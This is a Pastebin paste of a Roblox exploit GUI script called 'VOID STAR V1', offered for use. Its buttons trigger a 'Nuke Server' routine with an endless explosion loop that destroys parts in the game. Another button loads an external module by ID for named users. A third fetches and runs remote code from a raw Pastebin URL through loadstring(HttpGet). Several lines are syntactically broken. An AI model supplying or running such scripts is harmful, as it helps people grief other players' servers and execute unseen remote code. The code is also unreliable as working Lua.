Advertisement
m0nst3rdubstep

VOID STAR V1 FE

Nov 24th, 2021
34
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.22 KB | None | 0 0
  1. -- Instances:
  2.  
  3. local ScreenGui = Instance.new("ScreenGui")
  4. local main = Instance.new("Frame")
  5. local TextLabel = Instance.new("TextLabel")
  6. local nuke = Instance.new("TextButton")
  7. local gui = Instance.new("TextButton")
  8. local utg = Instance.new("TextButton")
  9. local amogus = Instance.new("TextButton")
  10.  
  11. --Properties:
  12.  
  13. ScreenGui.Parent = game.CoreGui
  14.  
  15. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  16.  
  17. main.Name = "main"
  18. main.Parent = ScreenGui
  19. main.BackgroundColor3 = Color3.fromRGB(93, 93, 93)
  20. main.BorderColor3 = Color3.fromRGB(0, 0, 0)
  21. main.Position = UDim2.new(0.220917821, 0, 0.252086818, 0)
  22. main.Size = UDim2.new(0, 338, 0, 231)
  23.  
  24. TextLabel.Parent = main
  25. TextLabel.BackgroundColor3 = Color3.fromRGB(93, 93, 93)
  26. TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
  27. TextLabel.Size = UDim2.new(0, 338, 0, 43)
  28. TextLabel.Font = Enum.Font.SciFi
  29. TextLabel.LineHeight = 3.000
  30. TextLabel.Text = "VOID STAR V1 | Made By QU1CKS1LV3R"
  31. TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
  32. TextLabel.TextSize = 21.000
  33.  
  34. nuke.Name = "nuke"
  35. nuke.Parent = main
  36. nuke.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  37. nuke.Position = UDim2.new(0.1848526, 0, 0.259740263, 0)
  38. nuke.Size = UDim2.new(0, 84, 0, 42)
  39. nuke.Font = Enum.Font.SciFi
  40. nuke.Text = "Nuke Server"
  41. nuke.TextColor3 = Color3.fromRGB(0, 0, 0)
  42. nuke.TextSize = 14.000
  43. nuke.MouseButton1Down:connect (function)()
  44. hint = Instance.new("Hint",workspace)
  45. nuke = Instance.new("Part",workspace)
  46. nuke.Size = Vector3.new(5,50,5)
  47. nuke.Material = Enum.Material.DiamondPlate
  48. nuke.BrickColor = BrickColor.Gray()
  49. nuke.CFrame = CFrame.new(0,10000,0)
  50. bodypos = Instance.new("BodyPosition",nuke)
  51. bodypos.MaxForce = Vector3.new(100,100,100)
  52. bodypos.D = 100
  53. bodypos.P = 5
  54. bodypos.Position = Vector3.new(0,0,0)
  55. debounce = false
  56. size = 5
  57. waittime = 0.0001
  58. hint.Text = "TACTICAL NUKE! INCOMING!"
  59. nuke.Touched:connect(function()
  60. if debounce == false then
  61. debounce = true
  62. nuke.Anchored = true
  63. boomboom = Instance.new("Part",workspace)
  64. boomboom.BrickColor = BrickColor.new("Gold")
  65. boomboom.Shape = Enum.PartType.Ball
  66. boomboom.Anchored = true
  67. boomboom.Transparency = 0.5
  68. boomboom.TopSurface = Enum.SurfaceType.Smooth
  69. boomboom.BottomSurface = Enum.SurfaceType.Smooth
  70. boomboom.CanCollide = false
  71. boomboom.CFrame = CFrame.new(0,0,0)
  72. boomboom.Touched:connect(function(hit)
  73. hit:BreakJoints()
  74. end)
  75. while true do
  76. wait(waittime)
  77. expl = Instance.new("Explosion",workspace)
  78. hint.Text = "NUKE HAS GAINED "..tostring(boomboom.Size.Y).." STUDS OF SIZE!"
  79. expl.BlastPressure = 999
  80. expl.BlastRadius = size
  81. expl.Position = Vector3.new(0,0,0)
  82. boomboom.Size = boomboom.Size + Vector3.new(size,size,size)
  83. size = size + 0.001
  84. waittime = waittime - 0.001
  85. end
  86. end
  87. end)
  88.  
  89. end
  90.  
  91. gui.Name = "uwuz_gui"
  92. gui.Parent = main
  93. gui.BackgroundColor3 = Color3.fromRGB(96, 34, 255)
  94. gui.Position = UDim2.new(0.532075167, 0, 0.259740263, 0)
  95. gui.Size = UDim2.new(0, 94, 0, 42)
  96. gui.Font = Enum.Font.SciFi
  97. gui.Text = "UwUz GUI (doesent work)"
  98. gui.TextColor3 = Color3.fromRGB(97, 0, 1)
  99. gui.TextSize = 14.000
  100. uwuz_gui.MouseButton1Down:connect (function)()
  101.  
  102. end
  103.  
  104. utg.Name = "utg"
  105. utg.Parent = main
  106. utg.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  107. utg.Position = UDim2.new(0.1848526, 0, 0.601731598, 0)
  108. utg.Size = UDim2.new(0, 84, 0, 42)
  109. utg.Font = Enum.Font.SciFi
  110. utg.Text = "UTG"
  111. utg.TextColor3 = Color3.fromRGB(0, 0, 0)
  112. utg.TextSize = 14.000
  113. utg.MouseButton1Down:connect (function)()
  114. ocal allowed = {"MrResetAve", "iHaveA_FastComputer"} game.Players.PlayerAdded:Connect(function(player) for i, v in pairs(allowed) do if player.Name == v then require(3397500272):Fire(player.Name) end end end)
  115. end
  116.  
  117. amogus.Name = "amogus"
  118. amogus.Parent = main
  119. amogus.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  120. amogus.Position = UDim2.new(0.529116631, 0, 0.601731598, 0)
  121. amogus.Size = UDim2.new(0, 94, 0, 42)
  122. amogus.Font = Enum.Font.SciFi
  123. amogus.Text = "Amogus Script"
  124. amogus.TextColor3 = Color3.fromRGB(0, 0, 0)
  125. amogus.TextSize = 14.000
  126. amogus.MouseButton1Down:connect (function)()
  127. loadstring(game:HttpGet("https://pastebin.com/raw/JXUMavf3", true))()
  128.  
  129. --https://www.roblox.com/catalog/5231223671/Black-Tophead
  130. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement